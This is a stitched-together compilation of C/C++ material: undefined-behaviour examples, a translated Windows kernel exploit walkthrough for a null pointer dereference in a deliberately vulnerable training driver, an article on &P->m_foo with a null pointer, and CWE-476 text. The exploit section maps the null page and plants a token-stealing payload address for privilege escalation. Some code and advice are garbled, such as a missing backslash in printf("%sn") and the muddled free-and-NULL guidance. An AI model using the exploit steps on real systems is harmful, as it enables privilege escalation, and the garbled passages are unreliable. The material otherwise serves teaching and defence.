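/* Counts occurrences of c in buf[0..len-1]. */
size_t count_char(const char *buf, size_t len, char c)
{
    const char *end = buf + len;   /* one past the end: legal to form */
    size_t n = 0;

    for (const char *p = buf; p != end; ++p)   /* end is compared only */
        if (*p == c)
            ++n;
    return n;
}
```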

Modifying a const variable using a pointer

int main (void)
{
    const int foo_readonly = 10;
    int *foo_ptr;

    foo_ptr = (int *)&foo_readonly; /* (1) This casts away the const qualifier */
    *foo_ptr = 20; /* This is undefined behavior */

    return 0;
}

Quoting ISO/IEC 9899:201x, section 6.7.3 §6:

If an attempt is made to modify an object defined with a const-qualified type through use
of an lvalue with non-const-qualified type, the behavior is undefined. […]


(1) In GCC this can throw the following warning: warning: assignment discards ‘const’ qualifier from pointer target type [-Wdiscarded-qualifiers]

Passing a null pointer to printf %s conversion

The %s conversion of printf requires the corresponding argument to be a pointer to the initial element of an array of character type. A null pointer does not point to the initial element of any array of character type, and thus the behavior of the following is undefined:

char *foo = NULL;
printf("%s", foo); /* undefined behavior */

However, the undefined behavior does not always mean that the program crashes — some systems take steps to avoid the crash that normally happens when a null pointer is dereferenced. For example Glibc is known to print

(null)

for the code above. However, add (just) a newline to the format string and you will get a crash:

char *foo = 0;
printf("%sn", foo); /* undefined behavior */

In this case, it happens because GCC has an optimization that turns printf("%sn", argument); into a call to puts with puts(argument), and puts in Glibc does not handle null pointers. All this behavior is standard conforming.

Note that null pointer is different from an empty string. So, the following is valid and has no undefined behaviour. It’ll just print a newline:

char *foo = "";
printf("%sn", foo);
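When a string may legitimately be absent, the portable approach is to substitute a placeholder before it reaches %s. The helper names printable and format_line are assumptions made for this sketch, and the "(null)" text simply mirrors what Glibc happens to print.

```c
#include <stddef.h>
#include <stdio.h>

/* Maps a null pointer to a printable placeholder string. */
const char *printable(const char *s)
{
    return s != NULL ? s : "(null)";
}

/* Formats s followed by a newline; never hands a null pointer to %s.
 * Returns the number of characters snprintf produced. */
int format_line(char *out, size_t size, const char *s)
{
    return snprintf(out, size, "%s\n", printable(s));
}
```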

Inconsistent linkage of identifiers

extern int var;
static int var; /* Undefined behaviour */

C11, §6.2.2, 7 says:

If, within a translation unit, the same identifier appears with both
internal and external linkage, the behavior is undefined.

Note that if a prior declaration of an identifier is visible, the later declaration takes on the prior declaration's linkage. C11, §6.2.2, 4 allows it:

For an identifier declared with the storage-class specifier extern in a
scope in which a prior declaration of that identifier is visible, if
the prior declaration specifies internal or external linkage, the
linkage of the identifier at the later declaration is the same as the
linkage specified at the prior declaration. If no prior declaration is
visible, or if the prior declaration specifies no linkage, then the
identifier has external linkage.

/* 1. This is NOT undefined */
static int var;
extern int var; 


/* 2. This is NOT undefined */
static int var;
static int var; 

/* 3. This is NOT undefined */
extern int var;
extern int var; 

Using fflush on an input stream

The C standard states that using fflush on an input stream is undefined behavior: fflush is defined only for output streams and for update streams whose most recent operation was not input. POSIX additionally defines it for seekable input files.

#include <stdio.h>

int main()
{
    int i;
    char input[4096];

    scanf("%i", &i);
    fflush(stdin); // <-- undefined behavior
    gets(input);

    return 0;
}

There is no standard way to discard unread characters from an input stream. Some implementations, however, use fflush to clear the stdin buffer. Microsoft defines the behavior of fflush on an input stream: if the stream is open for input, fflush clears the contents of the buffer. According to POSIX.1-2008, the behavior of fflush is undefined unless the input file is seekable.

See Using fflush(stdin) for many more details.
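A commonly used portable substitute is to read and throw away the rest of the current line. This does not discard buffered input in general; it only consumes characters up to the next newline. The function name discard_line is an assumption for this sketch.

```c
#include <stdio.h>

/* Reads and drops characters up to and including the next newline.
 * Returns the last value read: '\n', or EOF if the stream ended first. */
int discard_line(FILE *in)
{
    int c;

    while ((c = getc(in)) != '\n' && c != EOF)
        ;   /* nothing to do: the character is simply dropped */
    return c;
}
```

In the program above, discard_line(stdin) would take the place of fflush(stdin), and fgets(input, sizeof input, stdin) would be a bounded replacement for gets, which was removed from the language in C11.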

Bit shifting using negative counts or beyond the width of the type

If the shift count is negative, both left shift and right shift operations are undefined (1):

int x = 5 << -3; /* undefined */
int x = 5 >> -3; /* undefined */

If left shift is performed on a negative value, it's undefined:

int x = -5 << 3; /* undefined */

If left shift is performed on a positive value and the mathematical result is not representable in the type, it's undefined (1):

/* Assuming an int is 32 bits wide, the value '5 * 2^72' doesn't fit
 * in an int. So, this is undefined. */

int x = 5 << 72;

Note that right shift on a negative value (e.g. -5 >> 3) is not undefined but implementation-defined.


(1) Quoting ISO/IEC 9899:201x, section 6.5.7:

If the value of the right operand is negative or is greater than or equal to the width of the promoted left operand, the behavior is undefined.
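A shift count that comes from outside can be validated before it is used. The sketch below works on unsigned values, for which overflow of the result is well defined, so only the count needs checking. The name checked_shl is made up, and the width computation assumes that unsigned int has no padding bits.

```c
#include <limits.h>
#include <stdbool.h>

/* Shifts value left by count bits if the count is in range.
 * Returns false, leaving *result untouched, when the shift would be
 * undefined because count is negative or not less than the width. */
bool checked_shl(unsigned value, int count, unsigned *result)
{
    /* Assumption: unsigned int has no padding bits. */
    const int width = (int)(sizeof value * CHAR_BIT);

    if (count < 0 || count >= width)
        return false;
    *result = value << count;
    return true;
}
```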

Modifying the string returned by getenv, strerror, and setlocale functions

Modifying the strings returned by the standard functions getenv(), strerror() and setlocale() is undefined. So, implementations may use static storage for these strings.

The getenv() function, C11, §7.22.4.6, 4, says:

The getenv function returns a pointer to a string associated with the
matched list member. The string pointed to shall not be modified by the
program, but may be overwritten by a subsequent call to the getenv
function.

The strerror() function, C11, §7.24.6.2, 4 says:

The strerror function returns a pointer to the string, the contents of
which are locale-specific. The array pointed to shall not be modified by
the program, but may be overwritten by a subsequent call to the
strerror function.

The setlocale() function, C11, §7.11.1.1, 8 says:

The pointer to string returned by the setlocale function is such that
a subsequent call with that string value and its associated category
will restore that part of the program’s locale. The string pointed to
shall not be modified by the program, but may be overwritten by a
subsequent call to the setlocale function.

Similarly the localeconv() function returns a pointer to struct lconv which shall not be modified.

The localeconv() function, C11, §7.11.2.1, 8 says:

The localeconv function returns a pointer to the filled-in object. The
structure pointed to by the return value shall not be modified by the
program, but may be overwritten by a subsequent call to the localeconv
function.
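If the text needs to be changed, or kept across later calls, the usual approach is to work on a private copy. The helpers copy_string and getenv_copy below are hypothetical names introduced for this sketch.

```c
#include <stdlib.h>
#include <string.h>

/* Returns a heap copy of s that the caller owns and must free(),
 * or NULL if s is NULL or the allocation fails. */
char *copy_string(const char *s)
{
    if (s == NULL)
        return NULL;

    size_t len = strlen(s) + 1;     /* include the terminator */
    char *copy = malloc(len);
    if (copy != NULL)
        memcpy(copy, s, len);
    return copy;
}

/* A private, modifiable copy of an environment value, or NULL if the
 * variable is not set. */
char *getenv_copy(const char *name)
{
    return copy_string(getenv(name));
}
```

The same copy_string call works for the results of strerror and setlocale. The copy stays valid after later calls that may overwrite the library's own buffer.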

Returning from a function that’s declared with `_Noreturn` or `noreturn` function specifier

C11

The function specifier _Noreturn was introduced in C11. The header <stdnoreturn.h> provides a macro noreturn which expands to _Noreturn. So using _Noreturn or noreturn from <stdnoreturn.h> is fine and equivalent.

A function that’s declared with _Noreturn (or noreturn) is not allowed to return to its caller. If such a function does return to its caller, the behavior is undefined.

In the following example, func() is declared with noreturn specifier but it returns to its caller.

#include <stdio.h>
#include <stdlib.h>
#include <stdnoreturn.h>

noreturn void func(void);

void func(void)
{
    printf("In func()...\n");
} /* Undefined behavior as func() returns */

int main(void)
{
    func();
    return 0;
}

gcc and clang produce warnings for the above program:

$ gcc test.c
test.c: In function ‘func’:
test.c:9:1: warning: ‘noreturn’ function does return
 }
 ^
$ clang test.c
test.c:9:1: warning: function declared 'noreturn' should not return [-Winvalid-noreturn]
}
^

An example using noreturn that has well-defined behavior:

#include <stdio.h>
#include <stdlib.h>
#include <stdnoreturn.h>

noreturn void my_exit(void);

/* calls exit() and doesn't return to its caller. */
void my_exit(void)
{
    printf("Exiting...\n");
    exit(0);
}

int main(void)
{
    my_exit();
    return 0;
}

Exploiting Kernel-Level Vulnerabilities in Windows. Part 6: Null Pointer Dereference

Author: Mohamed Shahat

The exploit code is available here.

Kernel-mode heaps (pools)

Heaps are dynamically allocated memory regions, unlike the stack, whose size is fixed.

Heaps allocated for kernel-mode components are called pools and fall into two main types:

  • Non-paged pool: these pools are guaranteed to reside in physical memory and are mainly used for data that may be accessed during a hardware interrupt (a point at which the system cannot handle page faults). Such memory is allocated with the ExAllocatePoolWithTag routine.
  • Paged pool: this memory can be paged in and out of the page file, which usually sits in the root directory of the Windows drive (for example, C:\pagefile.sys).

Such memory is allocated with the ExAllocatePoolWithTag routine, specifying the pool type (the poolType parameter) and a 4-byte "tag".

Pool allocations can be monitored with the poolmon utility.

If you want to dig deeper into pools, I recommend the article "Pushing the Limits of Windows: Paged and Nonpaged Pool" (and the rest of that series as well).

The vulnerability

The code is available here.

NTSTATUS TriggerNullPointerDereference(IN PVOID UserBuffer) {
    ULONG UserValue = 0;
    ULONG MagicValue = 0xBAD0B0B0;
    NTSTATUS Status = STATUS_SUCCESS;
    PNULL_POINTER_DEREFERENCE NullPointerDereference = NULL;

    PAGED_CODE();

    __try {
        // Verify if the buffer resides in user mode
        ProbeForRead(UserBuffer,
                     sizeof(NULL_POINTER_DEREFERENCE),
                     (ULONG)__alignof(NULL_POINTER_DEREFERENCE));

        // Allocate Pool chunk
        NullPointerDereference = (PNULL_POINTER_DEREFERENCE)
                                  ExAllocatePoolWithTag(NonPagedPool,
                                                        sizeof(NULL_POINTER_DEREFERENCE),
                                                        (ULONG)POOL_TAG);

        if (!NullPointerDereference) {
            // Unable to allocate Pool chunk
            DbgPrint("[-] Unable to allocate Pool chunk\n");

            Status = STATUS_NO_MEMORY;
            return Status;
        }
        else {
            DbgPrint("[+] Pool Tag: %s\n", STRINGIFY(POOL_TAG));
            DbgPrint("[+] Pool Type: %s\n", STRINGIFY(NonPagedPool));
            DbgPrint("[+] Pool Size: 0x%X\n", sizeof(NULL_POINTER_DEREFERENCE));
            DbgPrint("[+] Pool Chunk: 0x%p\n", NullPointerDereference);
        }

        // Get the value from user mode
        UserValue = *(PULONG)UserBuffer;

        DbgPrint("[+] UserValue: 0x%p\n", UserValue);
        DbgPrint("[+] NullPointerDereference: 0x%p\n", NullPointerDereference);

        // Validate the magic value
        if (UserValue == MagicValue) {
            NullPointerDereference->Value = UserValue;
            NullPointerDereference->Callback = &NullPointerDereferenceObjectCallback;

            DbgPrint("[+] NullPointerDereference->Value: 0x%p\n", NullPointerDereference->Value);
            DbgPrint("[+] NullPointerDereference->Callback: 0x%p\n", NullPointerDereference->Callback);
        }
        else {
            DbgPrint("[+] Freeing NullPointerDereference Object\n");
            DbgPrint("[+] Pool Tag: %s\n", STRINGIFY(POOL_TAG));
            DbgPrint("[+] Pool Chunk: 0x%p\n", NullPointerDereference);

            // Free the allocated Pool chunk
            ExFreePoolWithTag((PVOID)NullPointerDereference, (ULONG)POOL_TAG);

            // Set to NULL to avoid dangling pointer
            NullPointerDereference = NULL;
        }

#ifdef SECURE
        // Secure Note: This is secure because the developer is checking if
        // 'NullPointerDereference' is not NULL before calling the callback function
        if (NullPointerDereference) {
            NullPointerDereference->Callback();
        }
#else
        DbgPrint("[+] Triggering Null Pointer Dereference\n");

        // Vulnerability Note: This is a vanilla Null Pointer Dereference vulnerability
        // because the developer is not validating if 'NullPointerDereference' is NULL
        // before calling the callback function
        NullPointerDereference->Callback();
#endif
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        Status = GetExceptionCode();
        DbgPrint("[-] Exception Code: 0x%X\n", Status);
    }

    return Status;
}

A non-paged pool chunk the size of the NULL_POINTER_DEREFERENCE structure is allocated with the 4-byte tag kcaH. The structure has two fields:

typedef struct _NULL_POINTER_DEREFERENCE {
ULONG Value;
FunctionPointer Callback;
} NULL_POINTER_DEREFERENCE, *PNULL_POINTER_DEREFERENCE;

On x86 the structure occupies 8 bytes and contains a function pointer. If the user buffer contains MagicValue, the function pointer NullPointerDereference->Callback points to NullPointerDereferenceObjectCallback. But what happens if we do not pass that value?

In that case the pool chunk is freed and NullPointerDereference is set to NULL to avoid a dangling pointer. That trick is only sound if the pointer is then checked every time it is used. Setting it to NULL without any checks can, as shown below, end badly. Here Callback is called without verifying that the pointer refers to a valid structure. The result is a read from the null page (the first 64 KB), which lies in user space.

In other words, NullPointerDereference is a structure at address 0x00000000, and NullPointerDereference->Callback() calls whatever is stored at address 0x00000004.

Exploiting this "feature" takes the following steps:

  • Allocate the null page.
  • Place the payload address at 0x4.
  • Trigger the null page dereference through the driver IOCTL.

A brief history of mitigations against null page dereference vulnerabilities

Before continuing, let us look at what Windows developers have already done to prevent attacks based on null pointer dereference vulnerabilities.

  • EMET (Enhanced Mitigation Experience Toolkit): a protection tool that, among other things, guards against null page dereference attacks. It allocates the null page and marks it NOACCESS. EMET is no longer in use, and some of its functionality is built into Windows 10 as part of the exploit protection system.
  • Starting with Windows 8, allocating the first 64 KB is prohibited. The only exception is when the NTVDM component is enabled, and it is disabled by default.

So this vulnerability cannot be exploited on Windows 10. If you want to try, you need to enable NTVDM and then bypass SMEP (see part 4).

Recommended reading:

  • Exploit Mitigation Improvements in Windows 8
  • Windows 10 Mitigation Improvements

Allocating the null page

Before talking to the driver we need to allocate the null page and place the payload address at 0x4. The null page cannot be allocated through VirtualAllocEx. The alternative is to find the address of NtAllocateVirtualMemory in ntdll.dll and pass it a small non-zero base address, which gets rounded down to NULL.

To find the address of that function, we first use GetModuleHandle to get the address of ntdll.dll and then GetProcAddress to get the address of the function itself.

typedef NTSTATUS(WINAPI *ptrNtAllocateVirtualMemory)(
    HANDLE ProcessHandle,
    PVOID *BaseAddress,
    ULONG ZeroBits,
    PULONG AllocationSize,
    ULONG AllocationType,
    ULONG Protect
);

ptrNtAllocateVirtualMemory NtAllocateVirtualMemory = (ptrNtAllocateVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtAllocateVirtualMemory");
if (NtAllocateVirtualMemory == NULL)
{
    printf("[-] Failed to export NtAllocateVirtualMemory.");
    exit(-1);
}

Then we allocate the null page:

// Copied and modified from http://www.rohitab.com/discuss/topic/34884-c-small-hax-to-avoid-crashing-ur-prog/
LPVOID baseAddress = (LPVOID)0x1;
ULONG allocSize = 0x1000;
char* uBuffer = (char*)NtAllocateVirtualMemory(
GetCurrentProcess(),
&baseAddress, // Putting a small non-zero value gets rounded down to page granularity, pointing to the NULL page
0,
&allocSize,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);

To check that this works, we add a call to DebugBreak and inspect the memory after writing some value.
DebugBreak();
*(INT_PTR*)uBuffer = 0xaabbccdd;
kd> t
KERNELBASE!DebugBreak+0x3:
001b:7531492f ret

kd> ? @esi
Evaluate expression: 0 = 00000000

kd> t
HEVD!main+0x1a4:
001b:002e11e4 mov dword ptr [esi],0AABBCCDDh

kd> t
HEVD!main+0x1aa:
001b:002e11ea movsx ecx,byte ptr [esi]

kd> dd 0
00000000 aabbccdd 00000000 00000000 00000000
00000010 00000000 00000000 00000000 00000000
00000020 00000000 00000000 00000000 00000000
00000030 00000000 00000000 00000000 00000000
00000040 00000000 00000000 00000000 00000000
00000050 00000000 00000000 00000000 00000000
00000060 00000000 00000000 00000000 00000000
00000070 00000000 00000000 00000000 00000000

A neat way to check whether the null page is allocated is to call VirtualProtect, which queries and sets protection flags on memory pages. If VirtualProtect returns false, the null page is not allocated.

Controlling the execution flow

Now we need to place the payload address at 0x00000004:

*(INT_PTR*)(uBuffer + 4) = (INT_PTR)&StealToken;

We create the buffer to send to the driver and set a breakpoint at HEVD!TriggerNullPointerDereference + 0x114.
kd> dd 0
00000000 00000000 0107129c 00000000 00000000
00000010 00000000 00000000 00000000 00000000
00000020 00000000 00000000 00000000 00000000
00000030 00000000 00000000 00000000 00000000
00000040 00000000 00000000 00000000 00000000
00000050 00000000 00000000 00000000 00000000
00000060 00000000 00000000 00000000 00000000
00000070 00000000 00000000 00000000 00000000

After the payload runs and steals the token, the ret instruction executes and no stack adjustment is needed.


Figure 1: The exploit in action

Porting the exploit to Windows 7 x64

To make the exploit work on Windows 7 x64, change the offset at which the payload address is written, because the structure grows to 16 bytes. Also, remember to swap out the payload.

*(INT_PTR*)(uBuffer + 8) = (INT_PTR)&StealToken;
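The offsets 0x4 and 0x8 used above follow from the structure layout: with a null base pointer, the address the driver reads the callback from is simply the offset of the Callback field. The sketch below uses a stand-in structure (NULL_POINTER_DEREFERENCE_SKETCH, with uint32_t in place of ULONG) rather than the driver's real headers, so treat it as an illustration of the layout argument only.

```c
#include <stddef.h>
#include <stdint.h>

typedef void (*FunctionPointer)(void);

/* Stand-in for the driver's structure; uint32_t plays the role of ULONG. */
typedef struct {
    uint32_t Value;
    FunctionPointer Callback;
} NULL_POINTER_DEREFERENCE_SKETCH;

/* Offset of Callback from the start of the structure. When the structure
 * pointer is NULL, this is the address the callback is fetched from. */
size_t callback_offset(void)
{
    return offsetof(NULL_POINTER_DEREFERENCE_SKETCH, Callback);
}
```

On a typical 32-bit ABI the function pointer is 4 bytes and directly follows Value. On a typical 64-bit ABI it is 8 bytes and 8-byte aligned, so 4 bytes of padding are inserted after Value. Those figures depend on the ABI and are not guaranteed by the C standard.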

I recently and unintentionally started a large debate about whether it is legal in C/C++ to use the &P->m_foo expression when P is a null pointer. The programming community split into two camps. The first claimed with confidence that it wasn't legal, while the second was just as sure that it was. Both parties gave various arguments and links, and it occurred to me at some point that I had to make things clear. For that purpose, I contacted Microsoft MVP experts and the Visual C++ development team at Microsoft through a closed mailing list. They helped me prepare this article, and now everyone interested is welcome to read it. For those who can't wait to learn the answer: that code is NOT correct.

Debate history

It all started with an article about checking the Linux kernel with the PVS-Studio analyzer. But the issue has nothing to do with the check itself. The point is that in that article I cited the following fragment from the Linux code:

static int podhd_try_init(struct usb_interface *interface,
        struct usb_line6_podhd *podhd)
{
  int err;
  struct usb_line6 *line6 = &podhd->line6;

  if ((interface == NULL) || (podhd == NULL))
    return -ENODEV;
  ....
}

I called this code dangerous because I thought it to cause undefined behavior.

After that, I received a pile of emails and comments from readers objecting to that idea, and I was almost ready to give in to their convincing arguments. For instance, as proof of that code being correct they pointed out the implementation of the offsetof macro, which typically looks like this:

#define offsetof(st, m) ((size_t)(&((st *)0)->m))

We deal with null pointer dereferencing here, but the code still works well. There were also some other emails reasoning that since there had been no access by null pointer, there was no problem.

Although I tend to be gullible, I still try to double-check any information I may doubt. I started investigating the subject and eventually wrote a small article: «Reflections on the Null Pointer Dereferencing Issue».

Everything suggested that I had been right: One cannot write code like that. But I didn’t manage to provide convincing proof for my conclusions and cite the relevant excerpts from the standard.

After publishing that article, I again was bombarded by protesting emails, so I thought I should figure it all out once and for all. I addressed language experts with a question to find out their opinions. This article is a summary of their answers.

About C

The ‘&podhd->line6’ expression is undefined behavior in the C language when ‘podhd’ is a null pointer.

The C99 standard says the following about the ‘&’ address-of operator (6.5.3.2 «Address and indirection operators»):

The operand of the unary & operator shall be either a function designator, the result of a [] or unary * operator, or an lvalue that designates an object that is not a bit-field and is not declared with the register storage-class specifier.

The expression ‘podhd->line6’ is clearly not a function designator, the result of a [] or * operator. It is an lvalue expression. However, when the ‘podhd’ pointer is NULL, the expression does not designate an object since 6.3.2.3 «Pointers» says:

If a null pointer constant is converted to a pointer type, the resulting pointer, called a null pointer, is guaranteed to compare unequal to a pointer to any object or function.

When «an lvalue does not designate an object when it is evaluated, the behavior is undefined» (C99 6.3.2.1 «Lvalues, arrays, and function designators»):

An lvalue is an expression with an object type or an incomplete type other than void; if an lvalue does not designate an object when it is evaluated, the behavior is undefined.

So, the same idea in brief:

When -> was executed on the pointer, it evaluated to an lvalue where no object exists, and as a result the behavior is undefined.

About C++

In the C++ language, things are absolutely the same. The ‘&podhd->line6’ expression is undefined behavior here when ‘podhd’ is a null pointer.

The discussion at WG21 (232. Is indirection through a null pointer undefined behavior?), to which I referred in the previous article, brings in some confusion. The programmers participating in it insist that this expression is not undefined behavior. However, no one has found any clause in the C++ standard permitting the use of «podhd->line6» with «podhd» being a null pointer.

The «podhd» pointer fails the basic constraint (5.2.5/4, second bullet) that it must designate an object. No C++ object has nullptr as address.

Summing it all up

struct usb_line6 *line6 = &podhd->line6;

This code is incorrect in both C and C++ when the podhd pointer equals 0. If the pointer equals 0, undefined behavior occurs.

The program running well is pure luck. Undefined behavior may take different forms, including program execution in just the way the programmer expected. It’s just one of the special cases of undefined behavior, and that’s all.

You cannot write code like that. The pointer must be checked before being dereferenced.
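A corrected ordering can be sketched as follows. The structure definitions are empty stand-ins invented so that the fragment compiles on its own; they are not the kernel's real types, and the function name podhd_try_init_checked is likewise made up. ENODEV is assumed to be provided by <errno.h>, as it is on POSIX systems.

```c
#include <errno.h>
#include <stddef.h>

/* Stand-in types: the real kernel structures are far larger. */
struct usb_interface { int unused; };
struct usb_line6 { int unused; };
struct usb_line6_podhd { struct usb_line6 line6; };

int podhd_try_init_checked(struct usb_interface *interface,
                           struct usb_line6_podhd *podhd)
{
    struct usb_line6 *line6;

    /* Check first ... */
    if (interface == NULL || podhd == NULL)
        return -ENODEV;

    /* ... and only then form the address of the member. */
    line6 = &podhd->line6;
    (void)line6;    /* the rest of the initialization is omitted here */
    return 0;
}
```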

Additional ideas and links

  • When considering the idiomatic implementation of the ‘offsetof()’ operator, one must take into account that a compiler implementation is permitted to use what would be non-portable techniques to implement its functionality. The fact that a compiler’s library implementation uses the null pointer constant in its implementation of ‘offsetof()’ doesn’t make it OK for user code to use ‘&podhd->line6’ when ‘podhd’ is a null pointer.
  • GCC can / does optimize assuming no undefined behavior ever occurs, and would remove the null checks here — the Kernel compiles with a bunch of switches to tell the compiler not to do this. As an example, the experts refer to the article «What Every C Programmer Should Know About Undefined Behavior #2/3».
  • You may also find it interesting that a similar use of a null pointer was involved in a kernel exploit with the TUN/TAP driver. See «Fun with NULL pointers». The major difference that might cause some people to think the similarity doesn’t apply is that in the TUN/TAP driver bug the structure field that the null pointer accessed was explicitly taken as a value to initialize a variable instead of simply having the address of the field taken. However, as far as standard C goes, taking the address of the field through a null pointer is still undefined behavior.
  • Is there any case when writing &P->m_foo where P == nullptr is OK? Yes, for example when it is an argument of the sizeof operator: sizeof(&P->m_foo).
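Both points from the list can be shown in a few lines: user code should take field offsets with the standard offsetof macro from <stddef.h>, and an expression such as &P->m_foo is harmless inside sizeof because the operand is not evaluated. The structure S and the function names below are assumptions made for this sketch.

```c
#include <stddef.h>

struct S {
    char tag;
    int m_foo;
};

/* The portable way to obtain a field offset in user code. */
size_t foo_offset(void)
{
    return offsetof(struct S, m_foo);
}

/* sizeof does not evaluate its operand here, so no null pointer is
 * ever dereferenced; the result is just the size of an int*. */
size_t foo_pointer_size(void)
{
    struct S *P = NULL;
    return sizeof(&P->m_foo);
}
```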

Acknowledgements

This article has become possible thanks to the experts whose competence I can see no reason to doubt. I want to thank the following people for helping me in writing it:

  • Michael Burr is a C/C++ enthusiast who specializes in systems level and embedded software including Windows services, networking, and device drivers. He can often be found on the StackOverflow community answering questions about C and C++ (and occasionally fielding the easier C# questions). He has 6 Microsoft MVP awards for Visual C++.
  • Billy O’Neal is a (mostly) C++ developer and contributor to StackOverflow. He is a Microsoft Software Development Engineer on the Trustworthy Computing Team. He has worked at several security related places previously, including Malware Bytes and PreEmptive Solutions.
  • Giovanni Dicanio is a computer programmer, specialized in Windows operating system development. Giovanni wrote computer programming articles on C++, OpenGL and other programming subjects on Italian computer magazines. He contributed code to some open-source projects as well. Giovanni likes helping people solving C and C++ programming problems on Microsoft MSDN forums and recently on StackOverflow. He has 8 Microsoft MVP awards for Visual C++.
  • Gabriel Dos Reis is a Principal Software Development Engineer at Microsoft. He is also a researcher and a longtime member of the C++ community. His research interests include programming tools for dependable software. Prior to joining Microsoft, he was Assistant Professor at Texas A&M University. Dr. Dos Reis was a recipient of the 2012 National Science Foundation CAREER award for his research in compilers for dependable computational mathematics and educational activities. He is a member of the C++ standardization committee.

References

  1. Wikipedia. Undefined Behavior.
  2. A Guide to Undefined Behavior in C and C++. Part 1, 2, 3.
  3. Wikipedia. offsetof.
  4. LLVM Blog. What Every C Programmer Should Know About Undefined Behavior #2/3.
  5. LWN. Fun with NULL pointers. Part 1, 2.

CWE-476 Null Pointer Dereference is a programming error that occurs when a program attempts to dereference a null pointer. This can happen when the programmer mistakenly assumes that a pointer holding NULL actually points to a valid object. If the program dereferences the null pointer, the result can be a segmentation fault or other undefined behavior, which can lead to a crash.

Null pointer dereferences are particularly common in C and C++ programs, since these languages do not automatically check for NULL pointers. As a result, it is important for programmers to be careful when handling pointers in these languages.

There are a few ways to avoid null pointer dereferences. One is to use a language that handles them in a defined way; Java, for example, throws a NullPointerException instead of exhibiting undefined behavior. Another is to always check pointers for NULL before dereferencing them. Finally, some languages (such as Kotlin, Swift, and C#) provide null-safe access operators that check for null before dereferencing; C and C++ have no such operator. These operators can help reduce the risk of null pointer dereferences, but they are not foolproof.

Null pointer dereferences can be difficult to debug, since they can occur in code that appears to be correct. As a result, it is important to test programs thoroughly before releasing them. Additionally, tools such as valgrind can be used to detect null pointer dereferences at runtime.


NVD Categorization

CWE-476: NULL Pointer Dereference: A NULL pointer dereference occurs when the application dereferences a pointer that it expects to be valid, but is NULL, typically causing a crash or exit.

Description

The program can potentially dereference a null pointer, thereby raising
a NullPointerException. Null pointer errors are usually the result of
one or more programmer assumptions being violated. Most null pointer
issues result in general software reliability problems, but if an
attacker can intentionally trigger a null pointer dereference, the
attacker might be able to use the resulting exception to bypass security
logic or to cause the application to reveal debugging information that
will be valuable in planning subsequent attacks.

A null-pointer dereference takes place when a pointer with a value of
NULL is used as though it pointed to a valid memory area.

Null-pointer dereferences, while common, can generally be found and
corrected in a simple way. They will always result in the crash of the
process, unless exception handling (on some platforms) is invoked, and
even then, little can be done to salvage the process.

Consequences

  • Availability: Null-pointer dereferences invariably result in the
    failure of the process.

Exposure period

  • Requirements specification: The choice could be made to use a
    language that is not susceptible to these issues.
  • Implementation: Proper sanity checks at implementation time can
    serve to prevent null-pointer dereferences

Platform

  • Languages: C, C++, Java, Assembly
  • Platforms: All

Examples

Example 1

In the following code, the programmer assumes that the system always has
a property named “cmd” defined. If an attacker can control the program’s
environment so that “cmd” is not defined, the program throws a null
pointer exception when it attempts to call the trim() method.

   String cmd = System.getProperty("cmd");
   cmd = cmd.trim();
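
The same failure mode exists outside Java. Below is a minimal C++ sketch, assuming the setting is read from the environment with std::getenv, which returns a null pointer when the variable is not defined. The helper name trimmed_env_or and its fallback parameter are hypothetical and serve only as illustration:

```cpp
#include <cstdlib>
#include <string>

// Hypothetical helper: reads an environment variable and trims surrounding
// whitespace. When the variable is not defined, std::getenv returns a null
// pointer; the function returns `fallback` instead of dereferencing it.
std::string trimmed_env_or(const char* name, const std::string& fallback) {
    const char* raw = std::getenv(name);
    if (raw == nullptr) {
        return fallback;  // variable is not set: nothing to trim
    }
    const std::string value(raw);
    const char* whitespace = " \t\r\n";
    const std::string::size_type first = value.find_first_not_of(whitespace);
    if (first == std::string::npos) {
        return std::string();  // value consists only of whitespace
    }
    const std::string::size_type last = value.find_last_not_of(whitespace);
    return value.substr(first, last - first + 1);
}
```

A caller would write something like trimmed_env_or("cmd", "") and treat the fallback as "not configured", so an attacker who removes the variable gets a defined code path rather than a crash.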

Example 2

Null-pointer dereference issues can occur through a number of flaws,
including race conditions and simple programming omissions. While there
are no complete fixes aside from conscientious programming, the following
steps will go a long way to ensure that null-pointer dereferences do not
occur.

Before using a pointer, ensure that it is not equal to NULL:

if (pointer1 != NULL) {
  /* make use of pointer1 */
  /* ... */
}

When freeing pointers, ensure they are not set to NULL, and be sure to
set them to NULL once they are freed:

if (pointer1 != NULL) {
  free(pointer1);
  pointer1 = NULL;
}
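
The free-and-reset step can be wrapped in a small helper so that it is never forgotten. This is a sketch only; the name release_buffer is hypothetical, and it takes the address of the caller's pointer so that the caller's copy is the one that gets reset:

```cpp
#include <cstdlib>

// Hypothetical helper: frees the buffer that *slot refers to and resets the
// caller's pointer to null, so a later null check sees it as released.
void release_buffer(char** slot) {
    if (slot == nullptr || *slot == nullptr) {
        return;  // nothing to release
    }
    std::free(*slot);
    *slot = nullptr;  // a second call with the same slot is now harmless
}
```

Note that this protects only the pointer passed in; any other copies of the same address elsewhere in the program still dangle after the call.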

If you are working in a multi-threaded or otherwise asynchronous
environment, ensure that proper locking APIs are used to take a lock
before the if statement and to release it once the guarded block has
finished.
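
One way to sketch the locking advice in C++ uses std::mutex and std::lock_guard. The SharedMessage type and both function names are hypothetical; the point is only that the null check and the dereference happen under the same lock that writers take:

```cpp
#include <cstddef>
#include <mutex>
#include <string>

// Hypothetical shared state: `message` may be reset to null by another thread.
struct SharedMessage {
    std::mutex guard;
    const std::string* message = nullptr;
};

// Publishes (or clears, when text is null) the shared pointer under the lock.
void publish(SharedMessage& shared, const std::string* text) {
    std::lock_guard<std::mutex> lock(shared.guard);
    shared.message = text;
}

// Returns the length of the shared string, or 0 when none is published.
// The lock is held across both the null check and the dereference, so a
// writer that goes through publish() cannot clear the pointer in between.
std::size_t message_length(SharedMessage& shared) {
    std::lock_guard<std::mutex> lock(shared.guard);
    if (shared.message == nullptr) {
        return 0;
    }
    return shared.message->size();
}
```

The guarantee holds only if every writer goes through the same mutex, and the lock does not extend the lifetime of the pointed-to string, which the caller still has to keep alive.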

  • Miscalculated null termination
  • State synchronization error
  • Requirements specification: The choice could be made to use a
    language that is not susceptible to these issues.
  • Implementation: If all pointers that could have been modified are
    sanity-checked previous to use, nearly all null-pointer dereferences
    can be prevented.

The analyzer detected a fragment of code that might dereference a null pointer.

Here are several examples for which the analyzer generates the V522 diagnostic message:

if (pointer != 0 || pointer->m_a) { ... }
if (pointer == 0 && pointer->x()) { ... }
if (array == 0 && array[3]) { ... }
